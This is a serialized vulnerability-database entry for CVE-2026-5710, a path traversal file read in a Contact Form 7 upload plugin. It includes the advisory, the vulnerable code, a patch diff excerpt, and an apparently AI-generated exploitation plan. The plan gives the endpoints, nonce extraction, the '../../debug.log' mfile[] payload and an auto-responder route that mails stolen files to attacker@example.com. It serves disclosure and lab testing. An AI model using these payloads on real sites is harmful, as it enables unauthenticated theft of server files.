[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fB72hZQN1QcKICP85Zg8BwffzVHfZUI1NKir8ijiQpuI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-5710","drag-and-drop-multiple-file-upload-for-contact-form-7-unauthenticated-limited-arbitrary-file-read-via-mfile-field","Drag and Drop Multiple File Upload for Contact Form 7 \u003C= 1.3.9.6 - Unauthenticated Limited Arbitrary File Read via mfile Field","The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to Path Traversal leading to Arbitrary File Read in versions up to and including 1.3.9.6. This is due to the plugin using client-supplied mfile[] POST values as the source of truth for email attachment selection without performing any server-side upload provenance check, path canonicalization, or directory containment boundary enforcement. In dnd_wpcf7_posted_data(), each user-submitted filename is directly appended to the plugin's upload URL without sanitization. In dnd_cf7_mail_components(), the URL is converted back to a filesystem path using str_replace() and only file_exists() is used as the acceptance check before attaching the file to the outgoing CF7 email. This makes it possible for unauthenticated attackers to read and exfiltrate arbitrary files readable by the web server process via path traversal sequences in the mfile[] parameter, with files being disclosed as email attachments. Note: This vulnerability is limited to the 'wp-content' folder due to the wpcf7_is_file_path_in_content_dir() function in the Contact Form 7 plugin.","drag-and-drop-multiple-file-upload-contact-form-7",null,"\u003C=1.3.9.6","1.3.9.7","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-17 04:37:14","2026-04-17 17:25:54",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1005eb8c-da5a-4422-9d65-0f341ad755b2?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fjs\u002Fcodedropz-uploader-jquery.js","assets\u002Fjs\u002Fcodedropz-uploader-min.js","assets\u002Fjs\u002Fdev\u002Fjquery-dev.js","assets\u002Fjs\u002Fdev\u002Fnative-dev.js","drag-n-drop-upload-cf7.php","inc\u002Fdnd-upload-cf7.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-5710\n\n## 1. Vulnerability Summary\nThe **Drag and Drop Multiple File Upload for Contact Form 7** plugin (up to version 1.3.9.6) is vulnerable to an unauthenticated arbitrary file read vulnerability via path traversal. \n\nThe vulnerability exists because the plugin trusts client-supplied values in the `mfile[]` POST parameters. During form submission, the plugin appends these values to its upload directory URL in `dnd_wpcf7_posted_data()`. Subsequently, in `dnd_cf7_mail_components()`, it converts these URLs back into absolute filesystem paths using simple string replacement and attaches them to the outgoing Contact Form 7 email. Because there is no check to ensure the file was actually uploaded by the plugin or stays within the intended directory, an attacker can use `..\u002F` sequences to traverse the filesystem and attach any file readable by the web server (limited to the `wp-content` directory by Contact Form 7's own security boundaries) to the email.\n\n## 2. Attack Vector Analysis\n- **Target Endpoint**: Contact Form 7's AJAX or REST API submission endpoint.\n    - REST: `\u002Fwp-json\u002Fcontact-form-7\u002Fv1\u002Fcontact-forms\u002F\u003CID>\u002Ffeedback`\n    - AJAX: `\u002Fwp-admin\u002Fadmin-ajax.php?action=wpcf7_submit`\n- **Vulnerable Parameter**: The name of the `mfile` field defined in the form (e.g., `upload-file-1[]`).\n- **Authentication**: None required (Unauthenticated).\n- **Preconditions**: \n    - A Contact Form 7 form must exist that uses the `[mfile]` tag.\n    - The form should ideally have \"Mail (2)\" (auto-responder) enabled and configured to include the `mfile` field as an attachment, allowing the attacker to receive the file at an email address they control.\n\n## 3. Code Flow\n1. **Entry**: A user submits a CF7 form containing an `mfile` field.\n2. **Hook**: `inc\u002Fdnd-upload-cf7.php` registers `add_filter('wpcf7_posted_data', 'dnd_wpcf7_posted_data', 10, 1);`.\n3. **Processing**: `dnd_wpcf7_posted_data()` is called.\n    - It iterates through form tags.\n    - When it finds `basetype == 'mfile'`, it takes the POST data: \n      `$posted_data[$field_name][$key] = trailingslashit( $uploads_dir['upload_url'] ) . $file;`\n    - Here, `$file` is the attacker-supplied traversal string (e.g., `..\u002F..\u002F..\u002Fdebug.log`).\n4. **Sink**: `dnd_cf7_mail_components()` (hooked to `wpcf7_mail_components`) processes the mail components before sending.\n    - It retrieves the pseudo-URL from the submission data.\n    - It converts the URL to a path (e.g., by replacing `site_url()` with `ABSPATH`).\n    - It checks `if (file_exists($file_path))` and, if true, appends `$file_path` to `$components['attachments']`.\n5. **Exfiltration**: Contact Form 7 sends the email with the sensitive file attached to the recipient(s).\n\n## 4. Nonce Acquisition Strategy\nTo submit a Contact Form 7 form, a `_wpcf7_nonce` is typically required.\n\n1. **Identify Form**: Find a page containing a CF7 form with an `[mfile]` tag. If none exists, create one (see Test Data Setup).\n2. **Navigate**: Use `browser_navigate` to the page URL.\n3. **Extract CF7 Nonce**:\n   ```javascript\n   \u002F\u002F Execute via browser_eval\n   document.querySelector('input[name=\"_wpcf7_nonce\"]').value\n   ```\n4. **Extract Plugin AJAX Nonce** (if needed for supplementary actions):\n   - The plugin localizes its nonce in the `dnd_cf7_uploader` object.\n   ```javascript\n   \u002F\u002F Execute via browser_eval\n   window.dnd_cf7_uploader?.ajax_nonce\n   ```\n\n## 5. Exploitation Strategy\nThis exploit involves submitting a form with a malicious payload in the `mfile` field.\n\n1. **Step 1: Discover Form Details**\n   Identify the form ID (`_wpcf7`), the field name for the `mfile` tag, and the `_wpcf7_unit_tag`.\n\n2. **Step 2: Construct Payload**\n   - Target File: `wp-content\u002Fdebug.log` (common) or `wp-content\u002Fplugins\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Fdrag-n-drop-upload-cf7.php`.\n   - Traversal: Since the base directory is `wp-content\u002Fuploads\u002Fwp_dndcf7_uploads\u002F`, the relative path to `wp-content\u002F` is `..\u002F..\u002F`.\n   - Final Payload for `mfile` parameter: `..\u002F..\u002Fdebug.log`.\n\n3. **Step 3: Execute Attack (HTTP Request)**\n   Send a POST request to the CF7 REST API.\n   - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fcontact-form-7\u002Fv1\u002Fcontact-forms\u002F\u003CID>\u002Ffeedback`\n   - **Method**: `POST`\n   - **Content-Type**: `multipart\u002Fform-data`\n   - **Body Parameters**:\n     - `_wpcf7`: `\u003CID>`\n     - `_wpcf7_version`: (Current CF7 version)\n     - `_wpcf7_locale`: `en_US`\n     - `_wpcf7_unit_tag`: `\u003CTAG>`\n     - `_wpcf7_nonce`: `\u003CNONCE>`\n     - `your-email`: `attacker@example.com` (Target for auto-responder)\n     - `\u003CFIELD_NAME>[]`: `..\u002F..\u002Fdebug.log` (The traversal payload)\n\n## 6. Test Data Setup\nPrepare the environment using WP-CLI:\n\n1. **Install Plugins**:\n   ```bash\n   wp plugin install contact-form-7 --activate\n   wp plugin install drag-and-drop-multiple-file-upload-contact-form-7 --version=1.3.9.6 --activate\n   ```\n\n2. **Create a Canary File**:\n   ```bash\n   echo \"CONFIDENTIAL_DATA_LEAKED\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fsecret-leak.txt\n   ```\n\n3. **Create Vulnerable Form**:\n   Create a CF7 form that includes an `mfile` field and sends an auto-responder (Mail 2) to the user.\n   ```bash\n   # Use wp eval to create the form programmatically\n   wp eval '\n   $cf = wpcf7_contact_form::get_template();\n   $cf->set_title(\"Vulnerable Form\");\n   $cf->set_properties([\n       \"form\" => \"[text* your-name][email* your-email][mfile leak-field][submit \\\"Send\\\"]\",\n       \"mail_2\" => [\n           \"active\" => true,\n           \"recipient\" => \"[your-email]\",\n           \"sender\" => \"admin@example.com\",\n           \"subject\" => \"Your Files\",\n           \"body\" => \"See attached.\",\n           \"attachments\" => \"[leak-field]\"\n       ]\n   ]);\n   $cf->save();\n   echo \"Form ID: \" . $cf->id();\n   '\n   ```\n\n4. **Publish Page with Form**:\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[contact-form-7 id=\"\u003CFORM_ID>\"]'\n   ```\n\n## 7. Expected Results\n- The HTTP response from the CF7 endpoint should return `{\"status\":\"mail_sent\", \"message\":\"...\"}`.\n- Internally, the `$components['attachments']` array in the mailer will contain the resolved path: `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fsecret-leak.txt`.\n- In a real-world scenario, the attacker would receive an email at `attacker@example.com` with the file attached.\n\n## 8. Verification Steps\nSince actual email delivery might not be visible in the test container:\n1. **Check Mail Log**: If a mail logging plugin is installed, check for the sent attachment.\n2. **Mock Filter Test**: Use WP-CLI to verify that the plugin logic correctly resolves the traversal:\n   ```bash\n   wp eval '\n   $field_name = \"leak-field\";\n   $payload = \"..\u002F..\u002Fsecret-leak.txt\";\n   $uploads = dnd_get_upload_dir();\n   $pseudo_url = trailingslashit($uploads[\"upload_url\"]) . $payload;\n   \n   \u002F\u002F Simulate dnd_cf7_mail_components logic\n   $file_path = str_replace(site_url() . \"\u002F\", wp_normalize_path(ABSPATH), $pseudo_url);\n   echo \"Resolved Path: \" . $file_path . \"\\n\";\n   echo \"File Exists: \" . (file_exists($file_path) ? \"YES\" : \"NO\") . \"\\n\";\n   '\n   ```\n\n## 9. Alternative Approaches\nIf the REST API is disabled or restricted:\n- Use the AJAX entry point: `POST \u002Fwp-admin\u002Fadmin-ajax.php` with `action=wpcf7_submit`.\n- Ensure all standard CF7 hidden fields are included (`_wpcf7_container_post`, etc.).\n- If `wp-config.php` is restricted by `wpcf7_is_file_path_in_content_dir()`, target `wp-content\u002Fdebug.log` or a theme's `style.css` to confirm read access.","The Drag and Drop Multiple File Upload for Contact Form 7 plugin is vulnerable to unauthenticated arbitrary file read via path traversal in versions up to 1.3.9.6. The plugin trusts client-supplied filenames in the mfile[] POST parameter to resolve email attachment paths without performing server-side provenance checks or directory containment validation. This allows attackers to exfiltrate sensitive files within the wp-content directory by having them attached to outgoing Contact Form 7 emails.","\u002F\u002F inc\u002Fdnd-upload-cf7.php line 271\nif( $field->basetype == 'mfile' && isset( $posted_data[$field_name] ) && ! empty( $posted_data[$field_name] ) ) {\n    if ( is_array( $posted_data ) ) {\n        foreach( $posted_data[$field_name] as $key => $file ) {\n            $posted_data[$field_name][$key] = trailingslashit( $uploads_dir['upload_url'] ) . $file;\n        }\n    }\n}\n\n---\n\n\u002F\u002F inc\u002Fdnd-upload-cf7.php line 211 (Mirroring the conversion logic used in the mailer sink)\n\u002F\u002F Convert url to dir\n$file = str_replace( site_url() . '\u002F', wp_normalize_path( ABSPATH ), $file_url );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.6\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.7\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.6\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js\t2026-03-05 05:19:50.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002F1.3.9.7\u002Fassets\u002Fjs\u002Fcodedropz-uploader-jquery.js\t2026-04-17 04:16:40.000000000 +0000\n@@ -2,14 +2,60 @@\n  * CodeDropz Uploader\n  * Copyright 2018 Glen Mongaya\n  * CodeDrop Drag&Drop Uploader\n- * @version 1.3.9.6\n+ * @version 1.3.9.7\n  * @author CodeDropz, Glen Don L. Mongaya\n  * @license The MIT License (MIT)\n  *\u002F\n \n+\u002F\u002F New: Native helper - find elements within a context (replaces $(selector, ctx))\n+function _find( ctx, selector ) {\n+\tif ( ! ctx ) return [];\n+\tif ( typeof ctx === 'string' ) ctx = document.querySelector( ctx );\n+\treturn Array.from( ( ctx || document ).querySelectorAll( selector ) );\n+}\n+\n+\u002F\u002F New: Native helper - get a single element\n+function _findOne( ctx, selector ) {\n+\tif ( ! ctx ) return null;\n+\tif ( typeof ctx === 'string' ) ctx = document.querySelector( ctx );\n+\treturn ( ctx || document ).querySelector( selector );\n+}\n+\n+\u002F\u002F New: Native helper - add class to element\n+function _addClass( el, cls ) {\n+\tif ( el && cls ) el.classList.add( cls );\n+}\n+\n+\u002F\u002F New: Native helper - remove class from element\n+function _removeClass( el, cls ) {\n+\tif ( el && cls ) el.classList.remove( cls );\n+}\n+\n+\u002F\u002F New: Native helper - check if element has class\n+function _hasClass( el, cls ) {\n+\treturn el ? el.classList.contains( cls ) : false;\n+}\n+\n+\u002F\u002F New: Native helper – safely append HTML after an element\n+function _insertAfter( referenceEl, html ) {\n+\tif ( ! referenceEl || ! html ) return null;\n+\tvar template = document.createElement( 'div' );\n+\ttemplate.innerHTML = html;\n+\tvar node = template.firstChild;\n+\treferenceEl.parentNode.insertBefore( node, referenceEl.nextSibling );\n+\treturn node;\n+}\n+\n+\u002F\u002F New: Native helper – safely escape HTML to prevent XSS in file names\n+function _escapeHtml( str ) {\n+\tvar div = document.createElement( 'div' );\n+\tdiv.appendChild( document.createTextNode( String( str ) ) );\n+\treturn div.innerHTML;\n+}","The exploit is performed by submitting a Contact Form 7 form that includes an mfile upload tag. An unauthenticated attacker first obtains a valid CF7 submission nonce and the form's unit tag from the target page. They then send a POST request to either the CF7 AJAX endpoint or the REST API endpoint (\u002Fwp-json\u002Fcontact-form-7\u002Fv1\u002Fcontact-forms\u002F\u003CID>\u002Ffeedback). The payload consists of adding a path traversal sequence to the field name corresponding to the mfile tag (e.g., upload-file-1[]: ..\u002F..\u002Fdebug.log). Because the plugin trusts this value as the file name to be retrieved from its upload directory, it resolves the traversal to an absolute path on the server (limited to wp-content). If the form is configured with an auto-responder (Mail 2) that includes the mfile tag, the plugin will attach the requested sensitive file to the email and send it to the address provided by the attacker in the submission.","gemini-3-flash-preview","2026-04-20 20:13:52","2026-04-20 20:14:33",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.3.9.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags\u002F1.3.9.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdrag-and-drop-multiple-file-upload-contact-form-7.1.3.9.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags\u002F1.3.9.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdrag-and-drop-multiple-file-upload-contact-form-7.1.3.9.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags"]